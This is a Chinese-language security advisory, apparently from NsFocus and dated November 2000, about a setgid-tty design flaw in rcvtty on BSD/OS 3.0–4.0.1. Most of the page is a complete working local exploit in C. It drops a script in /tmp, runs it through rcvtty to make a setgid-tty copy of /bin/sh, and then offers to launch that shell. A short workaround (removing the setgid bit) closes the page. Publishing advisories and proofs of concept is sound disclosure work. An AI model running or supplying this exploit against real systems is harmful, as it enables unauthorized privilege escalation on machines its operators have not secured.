安全研究
安全漏洞
BSDi3.0/4.0 rcvtty执行任意脚本漏洞
发布日期:2000-11-29
更新日期:2000-11-29
受影响系统:
描述:
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0
BSDi 3.0/4.0中的/usr/contrib/mh/lib/rcvtty存在一个设计缺陷。它缺省被设置了sgid
tty属性。当执行任意命令行上指定的shell脚本时,由于该程序没有丢弃sgid权限,则很容
易利用该缺陷获取tty组的权限,进而存在更深程度破坏系统安全性的可能。
<* 来源:Vade79 (v9@fakehalo.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* (BSDi3.0/4.0)rcvtty[mh] local exploit, by
* v9[v9@fakehalo.org]. gives gid=4(tty).
*
* info: found/exploit by: v9[v9@fakehalo.org].
*/
#define PATH "/usr/contrib/mh/lib/rcvtty"
#define MAKESHELL "/tmp/mksh.sh"
#define SGIDSHELL "/tmp/ttysh"
#define GIDTTY 4
#include <stdio.h>
#include <sys/stat.h>
int main ( int arg, char * argv[] )
{
char cmd[256], in[0];
struct stat mod1, mod2;
FILE * sgidexec;
fprintf( stderr, "[ (BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[v9@fakehalo.org ]. ]\n\n" );
if ( stat( PATH, &mod1 ) )
{
fprintf( stderr, "[!] failed, %s doesnt appear to exist.\n", PATH );
exit( 1 );
}
else if ( mod1.st_mode == 34285 && mod1.st_gid == GIDTTY )
{
fprintf( stderr, "[*] %s appears to be setgid tty(%d).\n", PATH, GIDTTY );
}
else
{
fprintf( stderr, "[!] failed, %s isn't setgid tty(%d).\n", PATH, GIDTTY );
exit( 1 );
}
fprintf( stderr, "[*] now making shell script to execute.\n" );
unlink( MAKESHELL );
sgidexec = fopen( MAKESHELL, "w" );
fprintf( sgidexec, "#!/bin/sh\n" );
fprintf( sgidexec, "cp /bin/sh %s\n", SGIDSHELL );
fprintf( sgidexec, "chgrp %d %s\n", GIDTTY, SGIDSHELL );
fprintf( sgidexec, "chmod 2755 %s\n", SGIDSHELL );
fclose( sgidexec );
chmod( MAKESHELL, 33261 );
fprintf( stderr, "[*] done, now building and executing the command line.\n" );
snprintf( cmd, sizeof( cmd ), "echo yes | %s %s 1>/dev/null 2>&1", PATH, MAKESHELL );
system( cmd );
unlink( MAKESHELL );
fprintf( stderr, "[*] done, now checking for success.\n" );
if ( stat( SGIDSHELL, &mod2 ) )
{
fprintf( stderr, "[!] failed, %s doesn't exist.\n", SGIDSHELL );
exit( 1 );
}
else if( mod2.st_mode == 34285 && mod2.st_gid == GIDTTY )
{
fprintf( stderr, "[*] success, %s is now setgid tty(%d).\n", SGIDSHELL, GIDTTY );
}
else
{
fprintf( stderr, "[!] failed, %s isn't setgid tty(%d).\n", SGIDSHELL, GIDTTY );
exit( 1 );
}
fprintf( stderr, "[*] finished, everything appeared to have gone successful.\n" );
fprintf( stderr, "[?] do you wish to enter the sgidshell now(y/n)?: " );
scanf( "%s", in );
if ( in[0] != 0x59 && in[0] != 0x79 )
{
printf( "[*] ok, aborting execution, the shell is: %s. otgpdvt.\n", SGIDSHELL );
}
else
{
printf( "[*] ok, executing shell(%s) now.\n", SGIDSHELL );
execl( SGIDSHELL, SGIDSHELL, 0 );
}
exit( 0 );
} /* end of main */
建议:
临时解决方案:
NsFocus建议您暂时 chmod g-s /usr/contrib/mh/lib/rcvtty
厂商补丁:
暂无
浏览次数:5939
严重程度:0(网友投票)
绿盟科技给您安全的保障